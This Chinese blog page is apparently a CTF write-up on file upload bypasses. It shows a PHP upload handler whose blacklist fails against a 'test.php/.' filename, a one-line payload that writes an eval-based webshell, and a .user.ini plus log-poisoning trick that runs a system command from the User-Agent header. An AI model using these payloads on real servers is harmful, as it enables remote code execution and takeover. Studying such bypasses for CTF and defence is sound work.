热门标签
热门文章
- 1刷一道leetcode花了一天,这正常吗?_力扣写一道题花一天时间
- 213(PHP连接Mysql)_php连接mysql数据库代码
- 3定时从linux获取文件,CentOS 6.4下定时通过ftp获取数据库服务器上的文件
- 4Docker 的安装使用_docker apt-get
- 5Flask Web开发:使用render_template渲染动态HTML模板
- 6c# 实习面试题_c#实习面试
- 7AI绘画:实例-利用Stable Diffusion ComfyUI实现多图连接:区域化提示词与条件设置_comfyui区域条件
- 8Python: 如何绘制核密度散点图和箱线图?_python 箱线图
- 9GitHub主页设计_给github主页装修
- 10GPU快速排序笔记_gpu quick sort
当前位置: article > 正文
文件上传绕过
作者:小小林熬夜学编程 | 2024-05-24 13:24:39
赞
踩
文件上传绕过
1.file_put_contents 路径漏洞
- <?php
-
- function waf($filename){
- $black_list = array("ph", "htaccess", "ini");
- $ext = pathinfo($filename, PATHINFO_EXTENSION);
- foreach ($black_list as $value) {
- //php stristr()函数 语法
-
- 作用:返回一个字符串在另一个字符串中开始位置到结束的字符串,不区分大小写
- if (stristr($ext, $value)){
- return false;
- }
- }
- return true;
- }
-
- if(isset($_FILES['file'])){
- $filename = urldecode($_FILES['file']['name']);
- $content = file_get_contents($_FILES['file']['tmp_name']);
- if(waf($filename)){
- file_put_contents($filename, $content);
- } else {
- echo "Please re-upload";
- }
- } else{
- highlight_file(__FILE__);
- }
-
-
这题看似上了waf,把能够造成敏感文件的php、配置文件等都给搬掉了,但是这里使用了file_put_contents()以及urlencode,当我们上传test.php/.这样的文件时候,因为file_put_contents()第一个参数是文件路径,操作系统会认为你要在test1.php文件所在的目录中创建一个名为.的文件,最后上传的结果就为test.php。
2.写入木马payload:
<?php fputs(fopen('webshell.php','w'),'<?php eval($_GET['shell']);?>')?>
3.题目过滤了< 不能传木马,然后可以通过.user.ini 配合日志文件包含:
直接UA写马 <?php system('tac /f*');?>
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小小林熬夜学编程/article/detail/617599
推荐阅读
相关标签
